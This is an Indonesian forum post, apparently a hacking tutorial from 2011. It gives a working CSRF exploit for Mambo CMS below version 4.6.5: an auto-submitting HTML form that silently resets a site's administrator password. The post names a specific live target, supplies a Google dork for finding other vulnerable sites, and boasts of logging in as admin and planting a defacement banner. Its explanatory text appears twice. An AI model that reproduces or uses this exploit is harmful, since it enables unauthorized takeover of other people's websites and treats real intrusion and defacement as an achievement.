Hack Mambo < 4.6.5 - CSRF (Mengubah Password Administrator)
Posted: Wed Aug 31, 2011 3:00 am
Mambo adalah CMS web opensource gratis yg banyak digunakan sebagai sistem managemen website. Mambo < 4.6.5 memiliki bug CSRF (Cross Site Request Forgery) dimana hacker bisa mengubah password admin melalui script sederhana. Ingat loh, hanya versi dibawah 4.6.5 yang bisa ditembus dengan teknik ini.
Kita mulai aja yah. tool yang diperlukan hanya
[-] Notepad dan
[-] Browser
buka notepad dan masukkan script dibawah ini. atau edit sesuai target website. google dork = Mambo is Free Software released under the GNU/GPL License.
perhatikan source diatas.
target web adalah http://www.classiminashost.com
username = admin
password = 123456
itu artinya penulis mengganti password administrator di http://www.classiminashost.com dengan 123456 tanpa perlu mengetahui password sebelumnya.
simpan dengan nama hackmambo.html, disini penulis menyimpan file hackmambo.html di desktop. lalu jalankan di browser anda. perhatikan gambar berikut dibawah:
setelah hackmambo.html dijalankan di browser, maka anda akan melihat ada 4 radio button diatas. tunggu beberapa saat sampai halaman redirect dan mengirimkan pengubahan password admin ke website target.
halaman akan redirect ke http://www.classiminashost.com/administ ... mainmenu=1 . isi username dengan admin dan password 123456
Yep.. sekarang penulis berhasil masuk sebagai administrator di http://www.classiminashost.com/ yang masih menggunakan mambo bersi 4.6.2. hmm sepertinya website ini baru dibuat.
sekalian nitip logo xcode.
Kita mulai aja yah. tool yang diperlukan hanya
[-] Notepad dan
[-] Browser
buka notepad dan masukkan script dibawah ini. atau edit sesuai target website. google dork = Mambo is Free Software released under the GNU/GPL License.
Code: Select all
<html>
<head>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
function fireForms()
{
var count = 1;
var i=0;
for(i=0; i<count; i++)
{
document.forms[i].submit();
}
}
</script>
<form action="http://www.classiminashost.com/administrator/index.php?option=com_users&task=editA&id=62&hidemainmenu=1" method="post" name="adminForm">
<input type="hidden" name="name" value="Administrator" />
<input type="hidden" name="username" value="admin" />
<input type="hidden" name="email" value="" />
<input type="hidden" name="password" value="123456" />
<input type="hidden" name="password2" value="123456" />
<input type="hidden" name="gid" value="25" />
<input type="radio" name="block" value="0" checked="checked" />
<input type="radio" name="block" value="1" />
<input type="radio" name="sendEmail" value="0" />
<input type="radio" name="sendEmail" value="1" checked="checked" />
</form>
target web adalah http://www.classiminashost.com
username = admin
password = 123456
itu artinya penulis mengganti password administrator di http://www.classiminashost.com dengan 123456 tanpa perlu mengetahui password sebelumnya.
simpan dengan nama hackmambo.html, disini penulis menyimpan file hackmambo.html di desktop. lalu jalankan di browser anda. perhatikan gambar berikut dibawah:
setelah hackmambo.html dijalankan di browser, maka anda akan melihat ada 4 radio button diatas. tunggu beberapa saat sampai halaman redirect dan mengirimkan pengubahan password admin ke website target.
halaman akan redirect ke http://www.classiminashost.com/administ ... mainmenu=1 . isi username dengan admin dan password 123456
Yep.. sekarang penulis berhasil masuk sebagai administrator di http://www.classiminashost.com/ yang masih menggunakan mambo bersi 4.6.2. hmm sepertinya website ini baru dibuat.
sekalian nitip logo xcode.
Code: Select all
http://www.classiminashost.com/images/stories//bannerxcode.bmp